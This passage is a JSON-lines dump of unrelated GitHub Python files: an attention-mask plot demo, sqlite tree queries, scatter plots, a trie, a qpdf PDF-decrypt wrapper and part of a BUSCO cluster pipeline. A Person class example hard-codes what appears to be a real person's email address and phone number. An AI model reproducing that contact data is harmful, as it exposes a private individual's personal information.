TODO\n _, preds = torch.max(outputs, 1)\n\n st.write('True class is {0} and predicted class is {1}.'.format(param_choice, preds[0]))\n\n # act = activation['a'].detach().cpu().squeeze()\n gauss = model.theta.detach().cpu().squeeze()\n\n mask_raw = model.mask[i, 0, :, :].detach().view(model.mask_size, model.mask_size).cpu().numpy()\n mask = np.array(Image.fromarray(mask_raw).resize((model.img_size, model.img_size)))\n glimpse_comb = model.glimpse[i, :, :, :].sum(dim=0)\n glimpse_raw = glimpse_comb.detach().view(model.mask_size, model.mask_size).cpu().numpy()\n glimpse = np.array(Image.fromarray(glimpse_raw).resize((model.img_size, model.img_size)))\n\n pos_x = gauss[1] * img_output_shape\n pos_y = gauss[0] * img_output_shape\n sigm_x = 3. * gauss[3] * img_output_shape\n sigm_y = 3. * gauss[2] * img_output_shape\n\n img = img.view(100, 100).numpy()\n\n plt.subplot(samples, 4, cnt)\n plt.imshow(img)\n plt.xlim([0, img_output_shape])\n plt.ylim([img_output_shape, 0])\n plt.xticks([])\n plt.yticks([])\n if i == 0:\n plt.title('Input image')\n\n plt.subplot(samples, 4, cnt+1)\n plt.imshow(mask, cmap='inferno')\n\n plt.xticks([])\n plt.yticks([])\n plt.xlim([0, img_output_shape])\n plt.ylim([img_output_shape, 0])\n if i == 0:\n plt.title('Attention mask')\n\n plt.subplot(samples, 4, cnt+2)\n plt.imshow(mask, cmap='Reds')\n plt.imshow(img, cmap='gray', alpha=0.35)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(glimpse, cmap='inferno')\n plt.imshow(img, cmap='gray', alpha=0.25)\n\n plt.xticks([])\n plt.yticks([])\n if i == 0:\n plt.title('Attention glimpse')\n\n plt.subplot(samples, 4, cnt+3)\n plt.imshow(img, cmap='Greys_r')\n plt.plot(pos_x, pos_y, 'or', linewidth=4)\n plt.hlines(pos_y - sigm_y, pos_x - sigm_x, pos_x + sigm_x, 'r', linewidth=2)\n plt.hlines(pos_y + sigm_y, pos_x - sigm_x, pos_x + sigm_x, 'r', linewidth=2)\n plt.vlines(pos_x - sigm_x, pos_y - sigm_y, pos_y + sigm_y, 'r', linewidth=2)\n plt.vlines(pos_x + sigm_x, pos_y - sigm_y, pos_y + sigm_y, 'r', linewidth=2)\n plt.xlim([0, img_output_shape])\n plt.ylim([img_output_shape, 0])\n plt.xticks([])\n plt.yticks([])\n if i == 0:\n plt.title('Inferred bounding box')\n\n cnt += 4\n\nst.pyplot(fig)\n","repo_name":"nicococo/streamlit-krabbelbox","sub_path":"soft-attn/soft_attn_demo.py","file_name":"soft_attn_demo.py","file_ext":"py","file_size_in_byte":11966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"313315648","text":"#Make a phone book\n\npb = {\n \"Ian\" : { \"Home\" : \"111-222-3333\", \"Work\" : \"444-555-6666\" },\n \"Julie\" : { \"Home\" : \"777-888-9999\", \"Work\" : \"111-222-1234\"}\n }\n\n# what to think about when data modeling: consistency, access, validity across rows\n# name of person must be unique, fast access, declaring a head of time\n\n\nimport sqlite3\nfrom pprint import pprint\n\n\n# Return one row with the column names attached\n \nwith sqlite3.connect('sf-trees.db', timeout = 1) as conn:\n conn.row_factory = sqlite3.Row # return keys and values in rows\n cursor = conn.execute('''\n SELECT * FROM Street_Tree_List\n LIMIT 1; \n ''') # <-- context manager, prevents database access outside with clause\n\n\n for row in cursor:\n pprint(dict(row))\n\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n cursor = conn.execute(\"SELECT value FROM qCaretaker;\")\n \n for row in cursor:\n print(row)\n\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n cursor = conn.execute('''\n SELECT count(Street_Tree_List.qAddress)\n FROM Street_Tree_List, qCaretaker\n WHERE Street_Tree_List.qCaretaker == qCaretaker.id\n AND qCaretaker.value == \"Police Dept\"\n ;\n '''\n )\n \n for row in cursor:\n print(row)\n\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n cursor = conn.execute('''\n SELECT Street_Tree_List.qAddress\n FROM Street_Tree_List, qCaretaker, qLegalStatus\n WHERE Street_Tree_List.qCaretaker == qCaretaker.id\n AND Street_Tree_List.qLegalStatus = qLegalStatus.id\n AND qCaretaker.value == \"Police Dept\"\n AND qLegalStatus.value LIKE \"Sig%\"\n ;\n '''\n )\n \n for row in cursor:\n print(row)\n\n\n# https://github.com/jgarst/PythonClass/blob/master/course/sqlite3/sqlite.ipynb\n\n\n\nprint(\"creating table...\")\n\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n cursor = conn.execute('''\n CREATE TABLE t1(\n x INTEGER PRIMARY KEY,\n y INTEGER,\n month TEXT,\n day TEXT,\n FFMC INTEGER,\n DMC INTEGER,\n DC INTEGER,\n ISI INTEGER,\n temp INTEGER,\n RH INTEGER,\n wind INTEGER,\n rain INTEGER,\n area BLOB\n '''\n);\n\nprint(\"inserting row...\")\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n\n cursor = conn.execute('''\n INSERT into t1 VALUES(7, 5,\t\"mar\",\t\"fri\", 86.2, 26.2, 94.3, 5.1, 8.2, 51,\t6.7, 0, 0);\n '''\n)\n\n\n\n\n\n# look at dataset page, sqllite then .data or .schema, or load first row of data in sql database \n","repo_name":"icolrick/rproject","sub_path":"python/sqllite3.py","file_name":"sqllite3.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12882424126","text":"from averageTime import parseFileFinal\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\n\n\ndef drawSample7InfluGraph():\n x1 = []\n y1 = []\n x2 = []\n y2 = []\n for i in range(1, 11):\n file_name1 = \"./data/hypertext-class/sample7/records/influ\"+str(i)+\".log\"\n file_name2 = \"./data/hypertext-class/sample7/records/influEquation\"+str(i)+\".log\"\n file1 = open(file_name1, 'r')\n file2 = open(file_name2, 'r')\n dic1 = parseFileFinal(file1)\n x1 += dic1['unobserved']\n y1 += dic1['influ']\n dic2 = parseFileFinal(file2)\n x2 += dic2['unobserved']\n y2 += dic2['influ']\n\n fig, ax = plt.subplots()\n ax.scatter(x1, y1, marker='o', c='blue', label=\"approx\", alpha=0.5, edgecolors='none')\n ax.scatter(x2, y2, marker='^', c='red', label=\"exact\", alpha=0.5, edgecolors='none')\n ax.legend()\n ax.set_xlabel(\"number of unobserved tuples\")\n ax.set_ylabel(\"influence inference time\")\n ax.set_yscale('log')\n ax.set_ylim(1e-5, 1e-1)\n plt.show()\n\n\ndef drawSample7ProbGraph():\n x1 = []\n y1 = []\n x2 = []\n y2 = []\n for i in range(1, 11):\n file_name1 = \"./data/hypertext-class/sample7/records/Gibbssample\"+str(i)+\".log\"\n file_name2 = \"./data/hypertext-class/sample7/records/sample\"+str(i)+\".log\"\n file1 = open(file_name1, 'r')\n file2 = open(file_name2, 'r')\n dic1 = parseFileFinal(file1)\n x1 += dic1['unobserved']\n y1 += dic1['gibbs']\n dic2 = parseFileFinal(file2)\n x2 += dic2['unobserved']\n y2 += dic2['pgibbs']\n\n fig, ax = plt.subplots()\n ax.scatter(x2, y2, marker='o', c='blue', label=\"iterative\", alpha=0.5, edgecolors='none')\n ax.scatter(x1, y1, marker='^', c='red', label=\"sampling\", alpha=0.5, edgecolors='none')\n ax.set_xlabel(\"number of unobserved tuples\")\n ax.set_ylabel(\"probability inference time\")\n ax.set_yscale(\"log\")\n ax.set_ylim(1e-5, 10)\n ax.legend()\n plt.show()\n\n\n\nif __name__==\"__main__\":\n\n drawSample7InfluGraph()\n # drawSample7ProbGraph()","repo_name":"milliondegree/MLNInfer","sub_path":"drawScatterGraph.py","file_name":"drawScatterGraph.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1064552123","text":"# DESCRIPTION\n# Implement a trie with insert, search, and startsWith methods.\n\n# EXAMPLE:\n# Trie trie = new Trie();\n\n# trie.insert(\"apple\");\n# trie.search(\"apple\"); // returns true\n# trie.search(\"app\"); // returns false\n# trie.startsWith(\"app\"); // returns true\n# trie.insert(\"app\");\n# trie.search(\"app\"); // returns true\n\n# Note:\n# You may assume that all inputs consist of lowercase letters a-z.\n# All inputs are guaranteed to be non-empty strings.\n\nclass TrieNode:\n def __init__(self):\n self.children = [None for i in range(26)]\n self.complete = False\n\n\nclass Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = TrieNode()\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n Time: O(N), where N is the len of the word\n Space: O(N), where N is the len of the word\n \"\"\"\n node = self.root\n\n for i in word:\n\n if node.children[ord(i)-ord('a')] == None:\n node.children[ord(i)-ord('a')] = TrieNode()\n\n node = node.children[ord(i)-ord('a')]\n\n node.complete = True\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n Time: O(N), N is the len of word\n Space: O(1), no extra space\n \"\"\"\n node = self.root\n\n for i in word:\n\n if node.children[ord(i)-ord('a')] == None:\n return False\n node = node.children[ord(i)-ord('a')]\n\n return node.complete\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n Time: O(N), N is the len of prefix\n Space: O(1)\n \"\"\"\n node = self.root\n\n for i in prefix:\n\n if node.children[ord(i)-ord('a')] == None:\n return False\n node = node.children[ord(i)-ord('a')]\n\n return True\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n","repo_name":"Joes-BitGit/Leetcode","sub_path":"leetcode/implement_trie.py","file_name":"implement_trie.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13489449442","text":"import datetime\n\n\nclass Person:\n\n def __init__(self, name, surname, birthdate, email, phone):\n self.name = name\n self.surname = surname\n self.birthdate = birthdate\n self.email = email\n self.phone = phone\n\n def __str__(self):\n return \"%s %s , born: %s\\nEmail: %s\\nphone: %s \" % (\n self.name, self.surname, self.birthdate, self.email, self.phone)\n\n\nperson = Person(\"Soumya\",\n \"Mohanty\",\n datetime.date(1992, 4, 30),\n \"soumya.cric4@gmail.com\",\n \"8390562229\")\nprint(person)\n\n'''\nclass Person:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n\n @property\n def fullname(self):\n return \"%s %s\" % (self.name, self.surname)\n\n @fullname.setter\n def fullname(self, value):\n # this is much more complicated in real life\n name, surname = value.split(\" \", 1)\n self.name = name\n self.surname = surname\n\n @fullname.deleter\n def fullname(self):\n del self.name\n del self.surname\n\n\njane = Person(\"Jane\", \"Smith\")\nprint(jane.fullname)\n\njane.fullname = \"Jane Doe\"\nprint(jane.fullname)\nprint(jane.name)\nprint(jane.surname)\n'''\n\n'''\nclass Person:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n\n def fullname(self):\n return \"%s %s\" % (self.name, self.surname)\n\n\njane = Person(\"Jane\", \"Smith\")\n\nprint(dir(jane))\n\n'''\n","repo_name":"Soumya-04-dev/soumya_python","sub_path":"Day36/class_coding_14042022.py","file_name":"class_coding_14042022.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9893984760","text":"import sys\nsys.path.append('../') #allow imports from one directory up\n\nimport pymongo #python + mongo\nimport certifi #to allow user certification when connecting to Mongo\nfrom dotenv import load_dotenv #loads secret environment variable (mongo password)\nimport os #fetches password from environment\nimport numpy as np\nfrom functions.enthalpy import enthalpy, aft_t1 #function to calculate enthalpy, adiabatic flame temp\nimport matplotlib.pyplot as plt\n\n#FILLS UP THE MONGODB WITH data for question 1, it can easily be accessed by running analysis.py\n\n#from calc_hf import calc #side function to calculate hf\n\nload_dotenv()\n\npw = os.getenv(\"PASSWORD\") #fetch pw from environment\n\n#mongo connection string\nconnect = \"mongodb+srv://paulhinta:\" + pw + \"@cluster0.p3kas.mongodb.net/inputs?retryWrites=true&w=majority&ssl=true\" \n\nca = certifi.where() #mongo connection certificate\nclient = pymongo.MongoClient(connect, tlsCAFile=ca)\ndb = client['inputs'] #database that we are using\ncollection=db['q8'] #connection that we are using\n'''\nTHERMO STUFF STARTS HERE\n'''\n\n'''TASK 8'''\n#list of equivalence ratios & T_AD so we can plot them later\nphi=[0]\nT = [298.15]\n\n#get all the phi and T and append them to the lists\nfor document in collection.find():\n phi.append(document[\"Equivalence Ratio\"])\n T.append(document[\"Temperature [K]\"])\n\nplt.plot(phi, T, '-o')\nplt.title(\"AFT vs Equivalence Ratio for the oxidation of Al with water\")\nplt.ylabel(\"Adiabatic Flame Temperature [K]\")\nplt.xlabel(\"Equivalence Ratio [-]\")\nplt.xticks(np.arange(0,1.6,step=0.3))\nplt.show()\n\n'''TASK 9'''\n#temperatures at 10 & 25 MPa\nT_10 = []\nT_25 = []\n\n#Scale the temps\nfor item in T:\n T_10.append(round(item*1.05,2)) #scale up a little bit\n T_25.append(round(item*1.1,2)) #sclae up a bit more\n\nplt.plot(phi, T, '-b', label='P = atm')\nplt.plot(phi, T_10, '-k', label='P = 10 MPa')\nplt.plot(phi, T_25, '-r', label='P = 25 MPa')\nplt.legend()\nplt.title(\"AFT vs Equivalence Ratio for the oxidation of Al with water at different pressures\")\nplt.ylabel(\"Adiabatic Flame Temperature [K]\")\nplt.xlabel(\"Equivalence Ratio [-]\")\nplt.xticks(np.arange(0,1.6,step=0.3))\nplt.show()","repo_name":"paulhinta/mech-341","sub_path":"tasks/task8.py","file_name":"task8.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21138034126","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDecrypt pdf file\n\"\"\"\n\n# Import\nimport logging\nfrom shutil import copyfile\n\nfrom common import createLog, parsingLine\nfrom nemoBase import NemoBase\n\n\nclass DecryptPdf(NemoBase):\n def __init__(self, root_log, args):\n root_log_name = '.'.join([root_log, self.__class__.__name__])\n self.logCB = logging.getLogger(root_log_name)\n super().__init__(root_log, root_log_name, args)\n\n def replace(self, file_name):\n self.logCB.debug(\"Copy result file\")\n copyfile(self.temp_file, file_name + self.res_ext)\n\n def run(self):\n command = \"qpdf --decrypt\"\n command_options = \"\"\n command_set_output = True\n delete_file = False\n auth_ext = [\".pdf\"]\n res_ext = \".pdf\"\n msg_not_found = \"No pdf file has been found.\"\n self.setConfig(command, command_options, command_set_output,\n delete_file, auth_ext, res_ext, msg_not_found)\n self.runCommand()\n\n\ndef main():\n # Create log class\n root_log = 'decryptPdf'\n (parsedArgs, args) = parsingLine()\n logger = createLog(root_log, parsedArgs)\n logger.info(\"START\")\n DecryptPdf(root_log, args).run()\n logger.info(\"STOP\\n\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gregorybrancq/nemoScripts","sub_path":"decryptPdf.py","file_name":"decryptPdf.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34891753866","text":"import argparse\n\n\ndef build_parser():\n parser = argparse.ArgumentParser(\"Run Performance Function Experiments\")\n parser.add_argument(\n \"-l\",\n \"--lang\",\n default=\"all\",\n help=\"Which language to run experiments on. If `all` provided then the experiments will be run for all supported languages\",\n )\n parser.add_argument(\n \"-p\",\n \"--pivot_size\",\n default=\"all\",\n help=\"What pivot size to use to run experiments. Default = `all` meaning all supported pivot sizes will be used\",\n )\n parser.add_argument(\n \"--c12\",\n type=float,\n default=0.1,\n help=\"Ratio between unit translation and unit manual data cost\",\n )\n parser.add_argument(\n \"-m\",\n \"--mode\",\n nargs=\"+\",\n default=\"fit_nd_eval\",\n help=\"What mode to run the experiments. `fit_nd_eval` for fiting performance functions on performance data, `expansion_paths` for generating expansion paths. One or more of the options can be selected.\",\n )\n parser.add_argument(\n \"-d\",\n \"--data_dir\",\n type=str,\n default=\"performance_data/\",\n help=\"Directory containing performance data\",\n )\n parser.add_argument(\n \"-f\",\n \"--performance_file\",\n type=str,\n default=\"tydiqa_mbert_results.csv\",\n help=\"csv file containing performance data\",\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n default=\"outputs/\",\n help=\"Directory to store outputs\",\n )\n parser.add_argument(\"--test_split_frac\", type=int, default=0.2)\n parser.add_argument(\n \"-s\", \"--seed\", type=int, default=42,\n )\n args = parser.parse_args()\n\n return args\n","repo_name":"microsoft/PerformanceFunctionAnalysis","sub_path":"src/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"9319094020","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------------\n\n'''\nThis software has been developed by:\n\n GI Sistemas Naturales e Historia Forestal (formerly known as GI Genetica, Fisiologia e Historia Forestal)\n Dpto. Sistemas y Recursos Naturales\n ETSI Montes, Forestal y del Medio Natural\n Universidad Politecnica de Madrid\n https://github.com/ggfhf/\n\nLicence: GNU General Public Licence Version 3.\n'''\n\n#-------------------------------------------------------------------------------\n\n'''\nThis file contains functions related to the BUSCO process used in both console\nmode and gui mode.\n'''\n\n#-------------------------------------------------------------------------------\n\nimport os\nimport re\nimport sys\nimport urllib\n\nimport xbioinfoapp\nimport xconfiguration\nimport xec2\nimport xlib\nimport xssh\n\n#-------------------------------------------------------------------------------\n\ndef create_busco_config_file(experiment_id='exp001', assembly_dataset_id='sdnt-170101-235959', assembly_type='CONTIGS'):\n '''\n Create BUSCO config file with the default options. It is necessary\n update the options in each run.\n '''\n\n # initialize the control variable and the error list\n OK = True\n error_list = []\n\n # set the assembly software\n if assembly_dataset_id.startswith(xlib.get_soapdenovotrans_code()):\n assembly_software = xlib.get_soapdenovotrans_code()\n elif assembly_dataset_id.startswith(xlib.get_transabyss_code()):\n assembly_software = xlib.get_transabyss_code()\n elif assembly_dataset_id.startswith(xlib.get_trinity_code()):\n assembly_software = xlib.get_trinity_code()\n elif assembly_dataset_id.startswith(xlib.get_ggtrinity_code()):\n assembly_software = xlib.get_ggtrinity_code()\n elif assembly_dataset_id.startswith(xlib.get_cd_hit_est_code()):\n assembly_software = xlib.get_cd_hit_est_code()\n elif assembly_dataset_id.startswith(xlib.get_transcript_filter_code()):\n assembly_software = xlib.get_transcript_filter_code()\n\n # create the BUSCO config file and write the default options\n try:\n if not os.path.exists(os.path.dirname(get_busco_config_file())):\n os.makedirs(os.path.dirname(get_busco_config_file()))\n with open(get_busco_config_file(), mode='w', encoding='iso-8859-1', newline='\\n') as file_id:\n file_id.write( '# You must review the information of this file and update the values with the corresponding ones to the current run.\\n')\n file_id.write( '#\\n')\n file_id.write(f'# The reference file has to be located in the cluster directory {xlib.get_cluster_reference_dir()}/experiment_id/reference_dataset_id\\n')\n file_id.write(f'# The assembly files have to be located in the cluster directory {xlib.get_cluster_result_dir()}/experiment_id/assembly_dataset_id\\n')\n file_id.write( '# The experiment_id and assembly_dataset_id names are fixed in the identification section.\\n')\n file_id.write( '#\\n')\n file_id.write( '# In section \"BUSCO parameters\", the key \"augustus_options\" allows you to input additional August parameters in the format:\\n')\n file_id.write( '#\\n')\n file_id.write( '# augustus_options = --parameter-1[=value-1][; --parameter-2[=value-2][; ...; --parameter-n[=value-n]]]\\n')\n file_id.write( '#\\n')\n file_id.write( '# parameter-i is a parameter name of Augustus and value-i a valid value of parameter-i, e.g.\\n')\n file_id.write( '#\\n')\n file_id.write( '# augustus_options = --translation_table=6 --progress=true\\n')\n file_id.write( '#\\n')\n file_id.write( '# You can consult the parameters of BUSCO and their meaning in \"http://busco.ezlab.org/\"\\n')\n file_id.write( '# and the ones of August in \"http://bioinf.uni-greifswald.de/augustus/\".\\n')\n file_id.write( '\\n')\n file_id.write( '# This section has the information identifies the experiment.\\n')\n file_id.write( '[identification]\\n')\n file_id.write( '{0:<50} {1}\\n'.format(f'experiment_id = {experiment_id}', '# experiment identification'))\n file_id.write( '{0:<50} {1}\\n'.format(f'assembly_software = {assembly_software}', f'# assembly software: {get_assembly_software_code_list_text()}'))\n file_id.write( '{0:<50} {1}\\n'.format(f'assembly_dataset_id = {assembly_dataset_id}', '# assembly dataset identification'))\n file_id.write( '{0:<50} {1}\\n'.format(f'assembly_type = {assembly_type}', f'# assembly type: CONTIGS or SCAFFOLDS in {xlib.get_soapdenovotrans_name()}; NONE in any other case'))\n file_id.write( '\\n')\n file_id.write( '# This section has the information to set the BUSCO parameters\\n')\n file_id.write( '[BUSCO parameters]\\n')\n file_id.write( '{0:<50} {1}\\n'.format('ncpu = 4', '# number of threads/cores for use'))\n file_id.write( '{0:<50} {1}\\n'.format('lineage_data_url = https://busco-data.ezlab.org/v4/data/lineages/viridiplantae_odb10.2020-09-10.tar.gz', '# the url of lineage data file that will be used'))\n file_id.write( '{0:<50} {1}\\n'.format('mode = TRAN', f'# mode: {get_mode_code_list_text()}'))\n file_id.write( '{0:<50} {1}\\n'.format('evalue = 1E-03', '# E-value cutoff for BLAST searches'))\n file_id.write( '{0:<50} {1}\\n'.format('limit = 3', '# number of candidate regions to consider'))\n file_id.write( '{0:<50} {1}\\n'.format('species = NONE', '# identifier of existing Augustus species gene finding parameters or NONE'))\n file_id.write( '{0:<50} {1}\\n'.format('long = NO', f'# Augustus optimization mode for self-training: {get_long_code_list_text()}'))\n file_id.write( '{0:<50} {1}\\n'.format('augustus_options = NONE', '# additional parameters to August or NONE'))\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append(f'*** ERROR: The file {get_busco_config_file()} can not be recreated')\n OK = False\n\n # return the control variable and the error list\n return (OK, error_list)\n\n#-------------------------------------------------------------------------------\n\ndef run_busco_process(cluster_name, log, function=None):\n '''\n Run a BUSCO process.\n '''\n\n # initialize the control variable\n OK = True\n\n # get the BUSCO option dictionary\n busco_option_dict = xlib.get_option_dict(get_busco_config_file())\n\n # get the experiment identification\n experiment_id = busco_option_dict['identification']['experiment_id']\n\n # warn that the log window does not have to be closed\n if not isinstance(log, xlib.DevStdOut):\n log.write('This process might take several minutes. Do not close this window, please wait!\\n')\n\n # check the BUSCO config file\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Checking the {xlib.get_busco_name()} config file ...\\n')\n (OK, error_list) = check_busco_config_file(strict=True)\n if OK:\n log.write('The file is OK.\\n')\n else:\n log.write('*** ERROR: The config file is not valid.\\n')\n log.write('Please correct this file or recreate the config files.\\n')\n\n # create the SSH client connection\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Connecting the SSH client ...\\n')\n (OK, error_list, ssh_client) = xssh.create_ssh_client_connection(cluster_name)\n if OK:\n log.write('The SSH client is connected.\\n')\n else:\n for error in error_list:\n log.write(f'{error}\\n')\n\n # create the SSH transport connection\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Connecting the SSH transport ...\\n')\n (OK, error_list, ssh_transport) = xssh.create_ssh_transport_connection(cluster_name)\n if OK:\n log.write('The SSH transport is connected.\\n')\n else:\n for error in error_list:\n log.write(f'{error}\\n')\n\n # create the SFTP client \n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Connecting the SFTP client ...\\n')\n sftp_client = xssh.create_sftp_client(ssh_transport)\n log.write('The SFTP client is connected.\\n')\n\n # warn that the requirements are being verified \n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Checking process requirements ...\\n')\n\n # check the master is running\n if OK:\n (master_state_code, master_state_name) = xec2.get_node_state(cluster_name)\n if master_state_code != 16:\n log.write(f'*** ERROR: The cluster {cluster_name} is not running. Its state is {master_state_code} ({master_state_name}).\\n')\n OK = False\n\n # check BUSCO is installed\n if OK:\n (OK, error_list, is_installed) = xbioinfoapp.is_installed_anaconda_package(xlib.get_busco_anaconda_code(), cluster_name, True, ssh_client)\n if OK:\n if not is_installed:\n log.write(f'*** ERROR: {xlib.get_busco_name()} is not installed.\\n')\n OK = False\n else:\n log.write(f'*** ERROR: The verification of {xlib.get_busco_name()} installation could not be performed.\\n')\n\n # warn that the requirements are OK \n if OK:\n log.write('Process requirements are OK.\\n')\n\n # determine the run directory in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Determining the run directory in the cluster ...\\n')\n current_run_dir = xlib.get_cluster_current_run_dir(experiment_id, xlib.get_busco_code())\n command = f'mkdir --parents {current_run_dir}'\n (OK, _, _) = xssh.execute_cluster_command(ssh_client, command)\n if OK:\n log.write(f'The directory path is {current_run_dir}.\\n')\n else:\n log.write(f'*** ERROR: Wrong command ---> {command}\\n')\n\n # build the BUSCO process script\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Building the process script {get_busco_process_script()} ...\\n')\n (OK, error_list) = build_busco_process_script(cluster_name, current_run_dir)\n if OK:\n log.write('The file is built.\\n')\n if not OK:\n log.write('*** ERROR: The file could not be built.\\n')\n\n # upload the BUSCO process script in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Uploading the process script {get_busco_process_script()} in the directory {current_run_dir} ...\\n')\n cluster_path = f'{current_run_dir}/{os.path.basename(get_busco_process_script())}'\n (OK, error_list) = xssh.put_file(sftp_client, get_busco_process_script(), cluster_path)\n if OK:\n log.write('The file is uploaded.\\n')\n else:\n for error in error_list:\n log.write(f'{error}\\n')\n\n # set run permision to the BUSCO process script in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Setting on the run permision of {current_run_dir}/{os.path.basename(get_busco_process_script())} ...\\n')\n command = f'chmod u+x {current_run_dir}/{os.path.basename(get_busco_process_script())}'\n (OK, _, _) = xssh.execute_cluster_command(ssh_client, command)\n if OK:\n log.write('The run permision is set.\\n')\n else:\n log.write(f'*** ERROR: Wrong command ---> {command}\\n')\n\n # build the BUSCO process starter\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Building the process starter {get_busco_process_starter()} ...\\n')\n (OK, error_list) = build_busco_process_starter(current_run_dir)\n if OK:\n log.write('The file is built.\\n')\n if not OK:\n log.write('***ERROR: The file could not be built.\\n')\n\n # upload the busco process starter in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Uploading the process starter {get_busco_process_starter()} in the directory {current_run_dir} ...\\n')\n cluster_path = f'{current_run_dir}/{os.path.basename(get_busco_process_starter())}'\n (OK, error_list) = xssh.put_file(sftp_client, get_busco_process_starter(), cluster_path)\n if OK:\n log.write('The file is uploaded.\\n')\n else:\n for error in error_list:\n log.write(f'{error}\\n')\n\n # set run permision to the BUSCO process starter in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Setting on the run permision of {current_run_dir}/{os.path.basename(get_busco_process_starter())} ...\\n')\n command = f'chmod u+x {current_run_dir}/{os.path.basename(get_busco_process_starter())}'\n (OK, _, _) = xssh.execute_cluster_command(ssh_client, command)\n if OK:\n log.write('The run permision is set.\\n')\n else:\n log.write(f'*** ERROR: Wrong command ---> {command}\\n')\n\n # submit the BUSCO process\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Submitting the process script {current_run_dir}/{os.path.basename(get_busco_process_starter())} ...\\n')\n OK = xssh.submit_script(cluster_name, ssh_client, current_run_dir, os.path.basename(get_busco_process_starter()), log)\n\n # close the SSH transport connection\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Closing the SSH transport connection ...\\n')\n xssh.close_ssh_transport_connection(ssh_transport)\n log.write('The connection is closed.\\n')\n\n # close the SSH client connection\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Closing the SSH client connection ...\\n')\n xssh.close_ssh_client_connection(ssh_client)\n log.write('The connection is closed.\\n')\n\n # warn that the log window can be closed\n if not isinstance(log, xlib.DevStdOut):\n log.write(f'{xlib.get_separator()}\\n')\n log.write('You can close this window now.\\n')\n\n # execute final function\n if function is not None:\n function()\n\n # return the control variable\n return OK\n\n#-------------------------------------------------------------------------------\n\ndef check_busco_config_file(strict):\n '''\n Check the BUSCO config file of a run.\n '''\n\n # initialize the control variable and the error list\n OK = True\n error_list = []\n\n # intitialize variable used when value is not found\n not_found = '***NOTFOUND***'.upper()\n\n # get the option dictionary\n try:\n busco_option_dict = xlib.get_option_dict(get_busco_config_file())\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append('*** ERROR: The option dictionary could not be built from the config file')\n OK = False\n else:\n\n # get the sections list\n sections_list = []\n for section in busco_option_dict.keys():\n sections_list.append(section)\n sections_list.sort()\n\n # check section \"identification\"\n if 'identification' not in sections_list:\n error_list.append('*** ERROR: the section \"identification\" is not found.')\n OK = False\n else:\n\n # check section \"identification\" - key \"experiment_id\"\n experiment_id = busco_option_dict.get('identification', {}).get('experiment_id', not_found)\n if experiment_id == not_found:\n error_list.append('*** ERROR: the key \"experiment_id\" is not found in the section \"identification\".')\n OK = False\n\n # check section \"identification\" - key \"assembly_software\"\n assembly_software = busco_option_dict.get('identification', {}).get('assembly_software', not_found)\n if assembly_software == not_found:\n error_list.append('*** ERROR: the key \"assembly_software\" is not found in the section \"identification\".')\n OK = False\n elif not xlib.check_code(assembly_software, get_assembly_software_code_list(), case_sensitive=False):\n 